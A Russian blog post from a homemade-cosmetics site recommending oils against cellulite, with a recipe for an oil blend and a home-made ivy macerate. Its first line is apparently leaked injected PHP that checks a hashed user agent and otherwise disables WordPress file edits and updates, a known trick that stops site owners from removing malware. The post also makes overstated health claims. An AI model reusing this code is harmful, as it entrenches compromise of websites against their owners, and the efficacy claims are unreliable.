if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Какие использовать масла, чтобы избавиться от целлюлита | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Какие использовать масла, чтобы избавиться от целлюлита

На сегодняшний день у многих девушек встречается целлюлит. Для того, чтобы он не появлялся, нужно вести здоровый образ жизни. Ну а если все же появились первые признаки апельсиновой корки, то скорее принимайте меры!

На сего­дняш­ний день у мно­гих деву­шек встре­ча­ет­ся цел­люлит. Для того, что­бы он не появ­лял­ся, нуж­но вести здо­ро­вый образ жиз­ни. Ну а если все же появи­лись пер­вые при­зна­ки апель­си­но­вой кор­ки, то ско­рее при­ни­май­те меры!

Бороть­ся с цел­люли­том мож­но с помо­щью раз­но­об­раз­ных диет, спе­ци­аль­ны­ми упраж­не­ни­я­ми и даже при­е­мом лекар­ствен­ных средств. Но я хочу рас­ска­зать про более здо­ро­вый путь — кос­ме­ти­че­ские сред­ства сде­лан­ные сво­и­ми руками.

В обыч­ных мага­зи­нах горо­да, кре­ма от цел­люли­та будут сто­ить доволь­но доро­го. Но, намно­го луч­ше исполь­зо­вать обыч­ные эфир­ные мас­ла, кото­рые эффек­тив­но помо­га­ют изба­вить­ся от цел­люли­та и повы­ша­ют эла­стич­ность вашей кожи:

  • мас­ло жожо­ба — предот­вра­ща­ет растяжки
  • маце­рат плю­ща — для упру­го­сти и тони­зи­ро­ва­ния кожи
  • маце­ра­ты фуку­са и лами­на­рии — про­ти­во­сто­ят задерж­ке воды
  • мас­ло розы мос­ке­ты (мускус­ной розы) — вос­ста­нав­ли­ва­ет, увлаж­ня­ет и пита­ет кожу, делая ее более гибкой
  • мас­ло аво­ка­до — тони­зи­ру­ет кожу
  • мас­ло анди­ро­бы — мощ­ное мас­ло с дока­зан­ным дей­стви­ем про­тив целлюлита
  • мас­ло зеле­но­го кофе — бога­то кофе­и­ном, спо­соб­ству­ет дренажу

А вот еще пару сове­тов, что­бы достичь оше­лом­ля­ю­щих эффектов:

  • При сме­ши­ва­нии этих масел, эффект будет намно­го луч­ше и эффективнее.
  • Для луч­ше­го эффек­та мож­но попро­бо­вать обер­ты­ва­ние с исполь­зо­ва­ни­ем этих масел.
  • Нано­си­те анти­цел­люлит­ные мас­ла после горя­чей ван­ны, пото­му что ваша кожа будет рас­слаб­лен­ной и рас­па­рен­ной, а зна­чит, будет погло­щать намно­го боль­ше полез­ных веществ.

А вот еще один рецепт для при­го­тов­ле­ния анти­цел­люлит­но­го мас­ла-осно­вы. Нам понадобится:

  1. мас­ло аво­ка­до (20 мл),
  2. мас­ло розы мос­ке­ты (10 мл),
  3. мас­ло жожо­ба (20 мл),
  4. маце­рат плю­ща с добав­ле­ни­ем олив­ко­во­го мас­ла (20 мл).
    30621

Если мас­ло аво­ка­до, розы и жожо­ба доволь­но лег­ко купить, то сде­лать маце­рат плю­ща мож­но сво­и­ми рука­ми. Для это­го вам пона­до­бит­ся 150 грамм листьев обык­но­вен­но­го плю­ща, кото­рые надо сме­шать со 150 мл олив­ко­во­го мас­ло. Далее, вам нуж­но оста­вить эту смесь ров­но на трид­цать дней, для настой­ки. После — про­це­ди­те и хра­ни­те в тем­ном месте.

Такая лечеб­ная кос­ме­ти­ка в домаш­них усло­ви­ях под­хо­дит всем жен­щи­нам и девуш­кам — ведь она помо­га­ет устра­нить эффект апель­си­но­вой кор­ки, вос­ста­но­вить тонус и упру­гость кожи, а так­же сти­му­ли­ру­ет обмен веществ.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!